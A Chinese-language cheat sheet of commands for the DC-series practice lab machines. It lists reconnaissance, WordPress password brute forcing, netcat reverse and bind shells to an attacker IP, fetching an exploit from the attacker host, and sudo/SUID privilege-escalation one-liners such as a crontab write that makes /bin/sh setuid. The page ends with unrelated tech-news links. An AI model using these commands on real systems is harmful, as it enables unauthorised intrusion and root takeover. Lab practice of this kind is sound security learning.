常用命令和工具:
metasploit nmap sqlmap 中国蚁剑 冰蝎 dirsearch dirbuster 等常用工具就不在此介绍了
whatweb是kali自带的一个信息搜集工具
nmap 192.168.26.0/24
nmap -sS -sV -T4 -A -p- 192.168.26.129
数据库密码hash解密工具john
whatweb http://dc-2 #常用于信息搜集 , 获取cms和服务器版本等信息
cewl是kali自带的一个密码字典生成工具
【ETC|DC系列靶机知识点总结】john password.txt #文件里是hash加密后的密码
针对wordpress站点可以使用wpscan先爆破该网站的用户名
cewl -w dc_passwords.txt http://dc-2 #按照一定规则 , 对网站爬取生成密码字典并写入到dc_passwords.txt中
通过已经wpscan扫描到的用户名和cewl生成的密码字典可以对目标进行爆破登录
wpscan --ignore-main-redirect --url 192.168.26.130 --enumerate u --force
漏洞搜索:
wpscan --ignore-main-redirect --url 192.168.26.130 -U dc-_user.txt -P dc_passwords.txt --force
python交互式shell
searchsploit joomla 3.7.0 #搜索joomla 3.7.0的漏洞
msfconsole #利用msf搜索相关组件漏洞
search joomla 3.7.0
RCE反弹shell的命令:
python -c ‘import pty;pty.spawn(\"/bin/bash\")’ #使用python获取交互式shell , 实际上也就是模拟了一个虚拟终端
SSH服务相关命令
nc -lvnp 666 #kali先监听666端口
nc 192.168.26.132 666 -e /bin/bash #在靶机上执行该命令 , ip为kali的IP
目标机器连接kali利用ssh将 exp下载到靶机上来
开启:/etc/init.d/ssh start
重启:/etc/init.d/ssh restart
关闭:/etc/init.d/ssh stop
状态:/etc/init.d/ssh status
ssh graham@192.168.26.134 # @符前为用户名 后面为要登录的服务器IP
涉及到的提权方式:
scp >root@192.168.26.20:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/ #靶机上执行 用户名和IP是kali的
scp /path/local_filename username@IP:/path #kali上执行 用户名和IP是靶机的
**Tips:**拿到一个本地普通用户后 , 往往先要在该用户的家目录下搜索一番 , 以寻找有用的信息 , 提权的时候几乎所有的文件操作都在tmp目录下 , 因为其他目录往往没有权限 , 所以要时刻注意自己当前所在的目录 。
suid之find提权
find / -user root -perm -4000 -print 2>/dev/null #发现具有suid权限的命令
sudo提权系列:
touch test
find test -exec whoami ;
find te -exec netcat -lvp 5556 -e /bin/sh ; //在被攻击服务器上执行>>该命令 监听本地5555端口 , 用于入站连接
netcat xx.xx.xx.xx 5556 // 自己服务器上 使用>nc 输入对方ip和端口 , 去连接 , 从而获得一个root权限的shell
sudo之teehee提权(方法不唯一)
sudo -l #查看可以无密码使用root权限的命令
sudo之git提权
输入以下命令即可提权成功
sudo git help config
h
!/bin/bash
teehee命令可以对文件进行写入操作 , 我们可以借此来提权
利用写入定时任务来提权
上面这条命令的意思是在/etc/crontab下写入定时计划 , 一分钟后由root用户给 /bin/bash 命令加权限(chmod 4777即开启suid和rwx权限) , 这样当我们再执行/bin/bash的时候就可以获得一个root权限的shell 。 除此之外还可以利用写入/etc/passwd文件添加一个有root权限的用户来提权 。
echo “* * * * * root chmod 4777 /bin/sh” | sudo teehee -a /etc/crontab # 参数 -a , 对指定文件进行追加 , 不覆盖
sudo之nmap提权
我们使用 sudo -l命令发现我们可以不用密码就能以root权限运行nmap
然后我们可以利用nmap来提权
由于我们可以以root权限 运行nmap , 然后我们让nmap去执行这个shell脚本 , 从而获取到一个root权限的shell 。
echo ‘os.execute(\"/bin/bash\")’ > shell #写一个脚本 , 调用系统命令执行/bin/bash
sudo nmap --script=shell
【一>所有资源关注我 , 私信回复“资料”获取<一】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
- 国行|Galaxy S22系列正式发布,完美工艺,出众性能,国行价格有惊喜!
- 三星|新机:小米12 Ultra堆料很猛;天玑9000新机就绪;三星S22系列发布
- 三星|三星拼了,国行版S22系列将于2月22日发布,加量不加价!
- 尼康|是在暗示魅族19系列要来了吗?官宣海报透露元宵节有大动作
- |对标小米12系列!Redmi K50系列67W充电起步,最高120W!
- GitHub|黑鲨5系列手机即将发布!全球首款将PC SSD装进手机,读写速度逆天
- gtx|英伟达旗下的高端显卡GTX,同系列两种制程工艺对比优缺点明显
- OLED|7个月后,国产屏下手机又来了,中兴红魔7系列官宣无孔全面屏
- 魅族|魅族:元宵节见!网友猜测:魅族19系列要来了
- spring|48核!英特尔至强处理器曝光,AMD锐龙7000系列三季度上市